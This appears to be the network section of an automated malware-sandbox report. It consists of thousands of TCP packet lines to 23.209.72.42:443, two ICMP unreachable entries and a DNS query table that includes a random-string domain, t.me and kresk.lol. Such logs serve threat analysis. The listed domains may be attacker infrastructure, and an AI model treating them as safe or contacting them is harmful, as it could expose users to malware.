                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.298011065 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.298021078 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.298032045 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304394960 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304450989 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304593086 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304605007 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304910898 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304922104 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304932117 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304941893 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.304944038 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.305466890 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.305478096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323004007 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323019981 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323154926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323165894 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323338985 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323479891 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323489904 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323499918 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.323510885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.324033022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.324043989 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330514908 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330562115 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330573082 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330889940 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330899954 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330909967 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.330921888 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.331587076 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.331598997 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.331609964 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.333816051 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344058990 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344129086 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344140053 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344402075 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344458103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344468117 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344481945 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.344504118 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.345032930 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.345042944 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.345055103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.364619017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.364639997 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.365017891 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.468409061 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.596208096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.792020082 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804003954 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804024935 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804135084 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804146051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804495096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804707050 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804718971 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.804729939 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805248022 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805268049 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805279016 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805290937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805301905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.805593014 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806072950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806086063 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806096077 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806107044 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806118965 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.806128979 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.832397938 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.869323969 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.155692101 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.188051939 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.194740057 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.194920063 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195040941 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195053101 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195194006 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195389986 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195400953 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.195411921 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.209947109 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.539455891 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.567285061 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572220087 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572513103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572582960 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572669029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572680950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.572949886 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.573116064 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.597928047 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.661747932 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.920728922 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:38.992599964 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012152910 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012490988 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012629986 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012783051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012976885 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.012991905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013009071 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013335943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013570070 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013581038 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013592005 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.013602972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014203072 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014277935 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014288902 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014300108 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014797926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014858961 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014869928 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.014880896 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.015568972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.029825926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.029921055 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.029932976 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.030242920 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.030266047 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.055933952 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.112262011 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.356780052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.431545973 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.438333035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.438534975 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.438678980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.438692093 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439002037 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439033031 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439043999 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439054966 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439584970 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439595938 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439606905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439620972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.439723969 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.440315008 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.440325022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.440341949 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.440352917 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.440361977 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.479305029 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.783955097 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.252861023 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.577759027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.593209982 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.593221903 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.593225956 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.596668005 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.614650011 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.933274984 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.939601898 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.939613104 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.939688921 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.940247059 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.951214075 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.276972055 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.285389900 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.285401106 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.285439014 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.285921097 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.293407917 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.619684935 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.637356043 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.637368917 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.637485027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.637691021 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.643949986 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.981781960 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.989465952 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.989481926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.989609003 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.989794970 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:49.995676994 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.314488888 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.322196960 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.322211027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.322309971 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.322864056 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.329772949 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.650887012 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.666994095 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.667131901 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.667141914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.667294025 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:50.674488068 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.016442060 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.019820929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.047868967 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.049938917 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.049989939 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.050079107 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.050398111 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.057328939 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.376579046 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.385970116 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.386085987 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.386154890 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.386254072 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.392232895 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.710818052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.719353914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.719417095 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.719482899 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.719794035 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.726079941 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.053455114 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.060858965 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.060887098 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.060986042 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.061152935 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.066781044 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.385437012 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.393558979 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.393579006 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.393673897 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.393819094 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.399842024 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.729948997 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.762707949 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.762721062 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.762725115 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.763108969 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:52.767939091 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:53.086590052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:53.093245029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:53.093261003 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:53.093324900 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:53.573740005 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.808404922 CET192.168.2.61.1.1.1c24c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.001472950 CET192.168.2.61.1.1.1c29d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:49.351084948 CET192.168.2.61.1.1.10x451aStandard query (0)YNwKHeEoflVmSgaTq.YNwKHeEoflVmSgaTqA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:39.472863913 CET192.168.2.61.1.1.10x4b61Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:41.690742970 CET192.168.2.61.1.1.10xfcb4Standard query (0)kresk.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.618365049 CET192.168.2.61.1.1.10x5fcdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.618592978 CET192.168.2.61.1.1.10xec0bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.520979881 CET192.168.2.61.1.1.10x5c58Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.521137953 CET192.168.2.61.1.1.10xcb26Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.402141094 CET192.168.2.61.1.1.10x9c9Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.402456045 CET192.168.2.61.1.1.10x8409Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815097094 CET192.168.2.61.1.1.10x2d50Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
